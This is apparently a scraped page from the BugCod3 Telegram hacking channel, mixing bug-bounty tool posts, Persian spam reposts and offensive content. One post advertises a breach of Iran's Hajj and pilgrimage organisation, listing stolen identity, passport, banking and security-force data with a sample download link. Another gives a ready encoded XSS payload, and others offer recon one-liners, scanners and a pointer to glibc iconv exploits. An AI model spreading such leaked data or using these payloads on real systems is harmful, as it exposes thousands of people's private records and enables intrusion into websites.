BugCod3
Open in Telegram
[ BugCod3 ] — From Shadows To Shells ⚡️ 🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools ⚔️ Learn • Hunt • Dominate 👥 Group: T.me/BugCod3GP 📂 Topic: T.me/BugCod3Topic 🌐 Web: BugCod3.com 🤖 Contact: T.me/BugCod3BOT 📧 Email: BugCod3@protonmail.com
Show more7 264
Subscribers
-1024 hours
-17 days
+43830 days
Posts Archive
7 265
Repost from N/a
⭕️لیستی از بهترین کانال های تلگرام به ارزش چند میلیون تومن همین امشب رایگان شد👇
https://t.me/addlist/w3T_2KfNqIc1Yzc8
‼️همین الان این فولدر رو رایگان اضافه کنید و از چنل ها نهایت استفاده رو ببرید‼️
7 265
Repost from N/a
⭕️لیستی از بهترین کانال های تلگرام به ارزش چند میلیون تومن همین امشب رایگان شد👇
https://t.me/addlist/wp_gCH9AlIM3ZDM0
‼️همین الان این فولدر رو رایگان اضافه کنید و از چنل ها نهایت استفاده رو ببرید‼️
7 265
Repost from N/a
⭕️لیستی از بهترین کانال های تلگرام به ارزش چند میلیون تومن همین امشب رایگان شد👇
https://t.me/addlist/aQBbu3n41VRkMDhk
‼️همین الان این فولدر رو رایگان اضافه کنید و از چنل ها نهایت استفاده رو ببرید‼️
7 265
📢 Hajj and pilgrimage organization was hacked by @irleaks!
In short, we have the following from the pilgrims during the years 1363 to 1403:
- Name, surname, father's name, date of birth, place of birth, birth certificate number, national code, national card series, marital status, occupation
- Contact information (home and work address, postal code, landline and mobile phone)
- Detailed inquiry information from the passport police (passport number, date of issuance and expiration) + passport scan
- 3x4 photo of pilgrims
- Visitor flight information
- Pilgrim insurance information
- Bail document information
- Banking and payment information
- Complete information of Hajj brokers
- Information about the accommodation status of pilgrims
- Full details of government and government officials
- Full details of quota dispatch, such as the families of the martyrs
- Full details of deployment of Naja forces
- Full details of deployment of Basij forces
- Full details of spiritual missions
- The source code of the organization's programs and services
Total data volume: 1.25 TB
⬇️ Example:
https://mega.nz/file/sYg0AT7C#fbfecMm0TJSx5MF25dU5TUK8mZvdzkKhKRTsQJCs-F0
#Haj #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
7 265
Repost from N/a
🚀 پروکسی گنگ فضایی سرعت موشکی سرعت دانلود فیلم 20 👇👇
https://t.me/proxy?server=ddyvhfff.co.uk&port=443&secret=7jK5IN_7UWQwKOL2uHjU6sFteS5pcmFuY2VsbC5pcg
7 265
Repost from N/a
⭕️لیستی از بهترین کانال های تلگرام به ارزش چند میلیون تومن همین امشب رایگان شد👇
https://t.me/addlist/iT_6rvml9VoxOGQ0
‼️همین الان این فولدر رو رایگان اضافه کنید و از چنل ها نهایت استفاده رو ببرید‼️
7 265
Cross Site Scripting Xss Payload
Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
#XSS #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 265
LazyEgg - Hunting JS Files
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'
#BugBounty #Tips #CyberSec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 265
GAP Burp Extension
💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
🔼 Installation:
⚪️ Visit Jython Offical Site, and download the latest stand alone JAR file, e.g.
jython-standalone-2.7.3.jar.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
⚪️ Download the GAP.py and requirements.txt from this project and place in the same directory.
⚪️ nstall Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.
💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ you can right click a request or response in any other context and select GAP from the Extensions menu.
😸 Github
⬇️ Download
🔒 BugCod3
#BurpSuite #Extensions
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 265
DOMAINIM
💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file
🔼 Installation:
cd domainim
nimble build
./domainim <domain> [--ports=<ports>]
💻 Usage:
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
📂 Examples:
⚪️ ./domainim nmap.org --ports=all
⚪️ ./domainim google.com --ports=none --dns=8.8.8.8#53
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
⚪️ ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
😸 Github
⬇️ Download
🔒 BugCod3
#Pentest #RedTeam #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 265
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
BugCod3
#CVE #Exploit #Cnext
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 265
Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.
🌎 Blog
#ATM #Malware #News
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Available now! Telegram Research 2025 — the year's key insights 
